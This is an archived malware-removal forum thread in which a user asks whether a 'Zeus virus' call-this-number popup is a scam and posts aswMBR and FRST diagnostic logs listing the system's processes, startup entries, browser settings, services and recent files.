This is a read-only archive. No new posts or registrations. Privacy Page
Spyware / Malware / Virus Removal

Zeus virus....real or scam? [Solved]

14 min read

This thread's last reply is from . Advice, software, and links below may be out of date — treat specific steps and download links with caution.

Looking for the outcome? Ask AI

When I came home today there was a message on my desktop that said I was infected with Zeus virus, capable of stealing information and that I needed to call a number for proper removal.   I ran both Avast and Malwarebytes which showed no infections.  I just wanted you guys to check and see if this was  a problem,  or a way to get into my computer.  I am very cautious about calling numbers……thanks for the help and all that you do.  Here are the logs you have requested.

 

 

 

aswMBR version 1.0.1.2252 Copyright© 2014 AVAST Software
Run date: 2016-05-02 19:25:02
—————————–
19:25:02.219    OS Version: Windows x64 6.1.7601 Service Pack 1
19:25:02.219    Number of processors: 4 586 0x2A07
19:25:02.220    ComputerName: KATHY-PC  UserName: kathy
19:25:04.271    Initialize success
19:25:04.293    VM: initialized successfully
19:25:04.295    VM: Intel CPU BiosDisabled
19:25:06.186    AVAST engine defs: 16050203
19:25:15.300    Disk 0 (boot) \Device\Harddisk0\DR0 -> \Device\Ide\IdeDeviceP1T0L0-1
19:25:15.304    Disk 0 Vendor: Hitachi_HDS721010CLA332 JP4OA3MA Size: 953869MB BusType: 11
19:25:15.423    Disk 0 MBR read successfully
19:25:15.427    Disk 0 MBR scan
19:25:15.433    Disk 0 Windows 7 default MBR code
19:25:15.437    Disk 0 Partition 1 80 (A) 07    HPFS/NTFS NTFS          100 MB offset 2048
19:25:15.454    Disk 0 default boot code
19:25:15.467    Disk 0 Partition 2 00     07    HPFS/NTFS NTFS       953767 MB offset 206848
19:25:15.536    Disk 0 scanning C:\Windows\system32\drivers
19:25:22.683    Service scanning
19:25:40.392    Modules scanning
19:25:40.403    Disk 0 trace - called modules:
19:25:40.415    ntoskrnl.exe CLASSPNP.SYS disk.sys ataport.SYS PCIIDEX.SYS hal.dll msahci.sys
19:25:40.421    1 nt!IofCallDriver -> \Device\Harddisk0\DR0[0xfffffa800785e060]
19:25:40.426    3 CLASSPNP.SYS[fffff8800197f43f] -> nt!IofCallDriver -> \Device\Ide\IdeDeviceP1T0L0-1[0xfffffa8007590680]
19:25:42.463    AVAST engine scan C:\Windows
19:25:45.571    AVAST engine scan C:\Windows\system32
19:27:43.300    AVAST engine scan C:\Windows\system32\drivers
19:27:53.561    AVAST engine scan C:\Users\kathy
19:28:32.923    Disk 0 MBR has been saved successfully to "C:\Users\kathy\Desktop\MBR.dat"
19:28:32.933    The log file has been saved successfully to "C:\Users\kathy\Desktop\aswMBR.txt"
 

 

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:03-05-2016
Ran by [removed] (administrator) on KATHY-PC (02-05-2016 19:32:16)
Running from C:\Users\[removed]\Desktop
[removed] Platform: Windows 7 Home Premium Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe
(Microsoft Corporation) C:\Program Files\Windows Sidebar\sidebar.exe
(Secunia) C:\Program Files (x86)\Secunia\PSI\psi_tray.exe
(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe
() C:\Program Files (x86)\RealNetworks\RealDownloader\downloader2.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\ClientX64\officeclicktorun.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
() C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
(RealNetworks, Inc.) C:\Program Files (x86)\Real\RealPlayer\RPDS\Bin\rpdsvc.exe
() C:\Program Files (x86)\Real\UpdateService\RealPlayerUpdateSvc.exe
(Secunia) C:\Program Files (x86)\Secunia\PSI\psia.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(Secunia) C:\Program Files (x86)\Secunia\PSI\sua.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Digital Care Solutions) C:\Program Files\BDServices\BitDefenderCOM.exe
(Adobe Systems, Inc.) C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_21_0_0_213.exe
(Adobe Systems, Inc.) C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_21_0_0_213.exe


==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\…\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [176952 2016-03-19] (Apple Inc.)
HKLM-x32\…\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [7021880 2016-01-07] (AVAST Software)
HKLM-x32\…\RunOnce: [Malwarebytes Anti-Malware (cleanup)] => C:\ProgramData\Malwarebytes\Malwarebytes Anti-Malware\mbamdor.exe [55264 2016-03-10] (Malwarebytes)
Winlogon\Notify\LBTWlgn: c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll (Logitech, Inc.)
HKU\S-1-5-21-3123285271-2719112281-3259339859-1000\…\Run: [iCloudServices] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe [60688 2015-11-30] (Apple Inc.)
HKU\S-1-5-21-3123285271-2719112281-3259339859-1000\…\Run: [ApplePhotoStreams] => C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe [61200 2015-11-30] (Apple Inc.)
HKU\S-1-5-21-3123285271-2719112281-3259339859-1000\…\Run: [**eb72c195<*>] => "C:\Users\kathy\AppData\Local\fb05b4\0b8081.lnk" <===== ATTENTION (Value Name with invalid characters)
ShellIconOverlayIdentifiers: [  GoogleDriveBlacklisted] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2016-04-25] (Google)
ShellIconOverlayIdentifiers: [  GoogleDriveSynced] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2016-04-25] (Google)
ShellIconOverlayIdentifiers: [  GoogleDriveSyncing] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2016-04-25] (Google)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2016-01-07] (AVAST Software)
ShellIconOverlayIdentifiers: [GDriveSharedOverlay] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro1 (ErrorConflict)] -> {8BA85C75-763B-4103-94EB-9470F12FE0F7} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-04-19] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro2 (SyncInProgress)] -> {CD55129A-B1A1-438E-A425-CEBC7DC684EE} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-04-19] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro3 (InSync)] -> {E768CD3B-BDDC-436D-9C13-E1B39CA257B1} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-04-19] (Microsoft Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Secunia PSI Tray.lnk [2015-09-03]
ShortcutTarget: Secunia PSI Tray.lnk -> C:\Program Files (x86)\Secunia\PSI\psi_tray.exe (Secunia)
Startup: C:\Users\kathy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\beeba6.lnk [2016-04-26]
ShortcutTarget: beeba6.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 75.75.75.75 75.75.76.76
Tcpip\..\Interfaces\{90737AD7-EC0F-4A9A-9240-05C790471720}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{DDED8800-07B5-43B7-A17D-6F223175D62E}: [DhcpNameServer] 75.75.75.75 75.75.76.76

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.com/?trackid=sp-006
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxps://www.google.com/search?trackid=sp-006&q;={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKU\S-1-5-21-3123285271-2719112281-3259339859-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://www.google.com/search?trackid=sp-006&q;={searchTerms}
HKU\S-1-5-21-3123285271-2719112281-3259339859-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.com/?trackid=sp-006
HKU\S-1-5-21-3123285271-2719112281-3259339859-1000\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxps://www.google.com/?trackid=sp-006
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM -> {21A51130-7285-49FE-B3F6-2385CC71CDEA} URL = hxxp://www.bing.com/search?q={searchTerms}&form;=MNMTDF&pc;=MANM&src;=IE-SearchBox
SearchScopes: HKLM-x32 -> DefaultScope {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?trackid=sp-006&q;={searchTerms}
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> {21A51130-7285-49FE-B3F6-2385CC71CDEA} URL = hxxp://www.bing.com/search?q={searchTerms}&form;=MNMTDF&pc;=MANM&src;=IE-SearchBox
SearchScopes: HKLM-x32 -> {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?trackid=sp-006&q;={searchTerms}
SearchScopes: HKU\S-1-5-21-3123285271-2719112281-3259339859-1000 -> DefaultScope {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?trackid=sp-006&q;={searchTerms}
SearchScopes: HKU\S-1-5-21-3123285271-2719112281-3259339859-1000 -> {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?trackid=sp-006&q;={searchTerms}
BHO: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\Program Files (x86)\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin64.dll [2014-10-27] (RealDownloader)
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\OCHelper.dll [2016-03-18] (Microsoft Corporation)
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2016-01-07] (AVAST Software)
BHO: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\SetPointSmooth.dll [2014-05-19] (Logitech, Inc.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\URLREDIR.DLL [2016-03-18] (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\GROOVEEX.DLL [2016-04-19] (Microsoft Corporation)
BHO-x32: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\Program Files (x86)\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll [2014-10-27] (RealDownloader)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\Office15\OCHelper.dll [2016-03-18] (Microsoft Corporation)
BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2016-01-07] (AVAST Software)
BHO-x32: Windows Live Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-01-22] (Microsoft Corporation)
BHO-x32: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\32-bit\SetPointSmooth.dll [2014-05-19] (Logitech, Inc.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\Office15\URLREDIR.DLL [2016-03-18] (Microsoft Corporation)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-04-19] (Microsoft Corporation)
BHO-x32: No Name -> {E15A8DC0-8516-42A1-81EA-DC94EC1ACF10} -> No File
DPF: HKLM {7530BFB8-7293-4D34-9923-61A11451AFC5} hxxp://download.eset.com/special/eos/OnlineScanner.cab
DPF: HKLM-x32 {FFB3A759-98B1-446F-BDA9-909C6EB18CC7} hxxp://utilities.pcpitstop.com/da2/PCPitStop2.cab
Handler-x32: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll [2010-04-17] (Microsoft Corporation)
Handler-x32: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll [2010-04-17] (Microsoft Corporation)
Handler-x32: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL [2015-02-03] (Microsoft Corporation)

FireFox:
========
FF ProfilePath: C:\Users\kathy\AppData\Roaming\Mozilla\Firefox\Profiles\21kim9lc.default-1455458506894
FF DefaultSearchEngine.US: Google
FF Homepage: hxxp://www.wmcactionnews5.com/
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_21_0_0_213.dll [2016-04-07] ()
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-12] ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_21_0_0_213.dll [2016-04-07] ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2016-03-08] ()
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2015-11-03] (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-12] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL [2014-02-20] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=14.0.8117.0416 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-04-17] (Microsoft Corporation)
FF Plugin-x32: @Motive.com/NpMotive,version=1.0 -> C:\Program Files (x86)\ATT\8.3.1.18\ma\bin\npMotive.dll [No File]
FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll [No File]
FF Plugin-x32: @real.com/nppl3260;version=17.0.15.10 -> c:\program files (x86)\real\realplayer\Netscape6\nppl3260.dll [2015-02-18] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlhtml5videoshim;version=17.0.15 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll [2014-10-27] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprpplugin;version=17.0.15.10 -> c:\program files (x86)\real\realplayer\Netscape6\nprpplugin.dll [2015-02-18] (RealPlayer Cloud)
FF Plugin-x32: @rocketlife.com/RocketLife Secure Plug-In Layer;version=1.0.5 -> C:\ProgramData\Visan\plugins\npRLSecurePluginLayer.dll [2013-02-14] (RocketLife, LLP)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2015-12-18] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll [2015-12-18] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppl3260.dll [2015-02-18] (RealNetworks, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nprpplugin.dll [2015-02-18] (RealPlayer Cloud)
FF Extension: Motive Extension - C:\Program Files (x86)\Mozilla Firefox\extensions\[removed] [2013-03-14] [not signed]
FF HKLM-x32\…\Firefox\Extensions: [[removed]] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Extension: Avast Online Security - C:\Program Files\AVAST Software\Avast\WebRep\FF [2016-01-08]
FF HKLM-x32\…\Firefox\Extensions: [{ABDE892B-13A8-4d1b-88E6-365A6E755758}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF Extension: RealDownloader - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext [2015-02-18] [not signed]
FF HKLM-x32\…\Firefox\Extensions: [{338950EA-82DB-44C1-930D-0C28E023C9F0}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF HKLM-x32\…\Firefox\Extensions: [{F003DA68-8256-4b37-A6C4-350FA04494DF}] - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt
FF Extension: Logitech SetPoint - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt [2015-04-03] [not signed]
FF HKLM-x32\…\Firefox\Extensions: [[removed]] - C:\Program Files\AVAST Software\Avast\SafePrice\FF
FF Extension: Avast SafePrice - C:\Program Files\AVAST Software\Avast\SafePrice\FF [2016-01-07]

Chrome:
=======
CHR StartupUrls: Default -> "hxxps://www.facebook.com/?ref=tn_tnmn"
CHR DefaultSearchURL: Default -> hxxp://newtab.co/?q={searchTerms}
CHR DefaultSearchKeyword: Default -> NewTabCo
CHR DefaultSuggestURL: Default -> hxxp://newtab.co/suggest.php?q={searchTerms}
CHR Profile: C:\Users\kathy\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Avast Online Security) - C:\Users\kathy\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2016-05-02]
CHR Extension: (NewTab.co) - C:\Users\kathy\AppData\Local\Google\Chrome\User Data\Default\Extensions\hehmagdhjdamhcodiolgpgpmjbcogokj [2016-05-02]
CHR Extension: (Google Wallet) - C:\Users\kathy\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-02]
CHR HKLM-x32\…\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx [2016-01-07]

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [83768 2016-03-02] (Apple Inc.)
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [226440 2016-01-07] (AVAST Software)
R2 BitDefenderCOM; C:\Program Files\BDServices\BitDefenderCom.exe [1075712 2016-03-05] (Digital Care Solutions) [File not signed]
R2 ClickToRunSvc; C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe [2829552 2016-03-08] (Microsoft Corporation)
S3 Futuremark SystemInfo Service; C:\Program Files (x86)\Common Files\Futuremark Shared\Futuremark SystemInfo\FMSISvc.exe [130976 2011-03-01] (Futuremark Corporation)
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1514464 2016-03-10] (Malwarebytes)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1136608 2016-03-10] (Malwarebytes)
R2 RealNetworks Downloader Resolver Service; C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe [39568 2014-10-26] ()
R2 RealPlayer Cloud Service; c:\program files (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe [1141848 2015-02-18] (RealNetworks, Inc.)
R2 RealPlayerUpdateSvc; C:\Program Files (x86)\Real\UpdateService\RealPlayerUpdateSvc.exe [31856 2014-10-30] ()
R3 scan; C:\Program Files\BDServices\scan.dll [602456 2016-02-22] (Bitdefender)
R2 Secunia PSI Agent; C:\Program Files (x86)\Secunia\PSI\PSIA.exe [994360 2011-10-14] (Secunia)
R2 Secunia Update Agent; C:\Program Files (x86)\Secunia\PSI\sua.exe [399416 2011-10-14] (Secunia)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [28656 2016-01-07] (AVAST Software)
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [97648 2016-01-07] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [93528 2016-01-07] (AVAST Software)
R0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [65224 2016-01-07] (AVAST Software)
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1065720 2016-03-02] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [464256 2016-01-20] (AVAST Software)
R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [155304 2016-01-07] (AVAST Software)
R0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [273784 2016-01-07] (AVAST Software)
S3 ebdrv; C:\Windows\system32\drivers\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [27008 2016-03-10] (Malwarebytes)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [192216 2016-05-02] (Malwarebytes)
R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [64896 2016-03-10] (Malwarebytes Corporation)
S3 MREMP50; C:\Program Files (x86)\Common Files\Motive\MREMP50.sys [21248 2010-02-02] (Printing Communications Assoc., Inc. (PCAUSA)) [File not signed]
S3 MREMP50a64; C:\Program Files\Common Files\Motive\MREMP50a64.SYS [43008 2010-02-02] (Printing Communications Assoc., Inc. (PCAUSA))
S3 MRESP50; C:\Program Files (x86)\Common Files\Motive\MRESP50.sys [20096 2010-02-02] (Printing Communications Assoc., Inc. (PCAUSA)) [File not signed]
S3 MRESP50a64; C:\Program Files\Common Files\Motive\MRESP50a64.SYS [40960 2010-02-02] (Printing Communications Assoc., Inc. (PCAUSA))
R3 Trufos; C:\Windows\System32\DRIVERS\Trufos.sys [452040 2016-02-22] (BitDefender S.R.L.)
S3 cpuz134; \??\C:\Users\kathy\AppData\Local\Temp\cpuz134\cpuz134_x64.sys [X]
S3 cpuz135; \??\C:\Windows\TEMP\cpuz135\cpuz135_x64.sys [X]
S3 MREMPR5; \??\C:\PROGRA~2\COMMON~1\Motive\MREMPR5.SYS [X]
S3 MRENDIS5; \??\C:\PROGRA~2\COMMON~1\Motive\MRENDIS5.SYS [X]
S3 X6va015; \??\C:\Windows\SysWOW64\Drivers\X6va015 [X]
U3 aswMBR; \??\C:\Users\kathy\AppData\Local\Temp\aswMBR.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-05-02 19:32 - 2016-05-02 19:32 - 00021500 _____ C:\Users\kathy\Desktop\FRST.txt
2016-05-02 19:31 - 2016-05-02 19:32 - 00000000 ____D C:\FRST
2016-05-02 19:31 - 2016-05-02 19:31 - 02377216 _____ (Farbar) C:\Users\kathy\Desktop\FRST64.exe
2016-05-02 19:28 - 2016-05-02 19:28 - 00001887 _____ C:\Users\kathy\Desktop\aswMBR.txt
2016-05-02 19:28 - 2016-05-02 19:28 - 00000512 _____ C:\Users\kathy\Desktop\MBR.dat
2016-05-02 19:16 - 2016-05-02 19:16 - 00003128 _____ C:\Windows\System32\Tasks\SparkTrust Registration3
2016-05-02 19:16 - 2016-05-02 19:16 - 00000464 _____ C:\Windows\Tasks\SparkTrust Registration3.job
2016-05-02 19:16 - 2016-05-02 19:16 - 00000000 ____D C:\Users\kathy\AppData\Roaming\SparkTrust
2016-05-02 19:16 - 2016-05-02 19:16 - 00000000 ____D C:\Users\kathy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SparkTrust
2016-05-02 19:16 - 2016-05-02 19:16 - 00000000 ____D C:\ProgramData\SparkTrust
2016-05-02 19:16 - 2016-05-02 19:16 - 00000000 ____D C:\Program Files\BDServices
2016-05-02 19:16 - 2016-05-02 19:16 - 00000000 ____D C:\Program Files (x86)\SparkTrust
2016-05-02 19:14 - 2016-05-02 19:14 - 11137520 _____ (SparkTrust) C:\Users\kathy\Desktop\SparkTrust PC Cleaner Plus Setup_619F670E-9340-42DA-A200-E92019CCAB0E_.exe
2016-04-28 06:26 - 2016-04-28 06:26 - 00000866 _____ C:\Users\kathy\Documents\cc_20160428_062642.reg
2016-04-26 17:36 - 2016-04-26 17:36 - 00000000 ____D C:\Users\kathy\AppData\Roaming\c7738a
2016-04-26 17:36 - 2016-04-26 17:36 - 00000000 ____D C:\Users\kathy\AppData\Local\fb05b4
2016-04-26 14:19 - 2016-04-26 14:27 - 00000000 ____D C:\Users\kathy\AppData\Local\Xfinity Usage Meter
2016-04-17 06:33 - 2016-04-17 06:33 - 00002812 _____ C:\Users\kathy\Documents\cc_20160417_063339.reg
2016-04-17 06:18 - 2016-04-17 06:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2016-04-17 06:18 - 2016-04-17 06:18 - 00000000 ____D C:\Program Files\iTunes
2016-04-17 06:18 - 2016-04-17 06:18 - 00000000 ____D C:\Program Files\iPod
2016-04-17 06:18 - 2016-04-17 06:18 - 00000000 ____D C:\Program Files (x86)\iTunes
2016-04-17 06:16 - 2016-04-17 06:16 - 00000000 ____D C:\Windows\System32\Tasks\Apple
2016-04-17 06:16 - 2016-04-17 06:16 - 00000000 ____D C:\Program Files (x86)\Apple Software Update
2016-04-11 19:19 - 2016-05-02 19:06 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-05-02 19:30 - 2011-04-28 22:54 - 00000000 ____D C:\Users\kathy\Desktop\bad stuff programs
2016-05-02 19:06 - 2012-09-08 07:07 - 00000338 _____ C:\Windows\Tasks\HP Photo Creations Communicator.job
2016-05-02 18:59 - 2013-02-24 07:52 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-05-02 18:44 - 2013-05-04 19:19 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
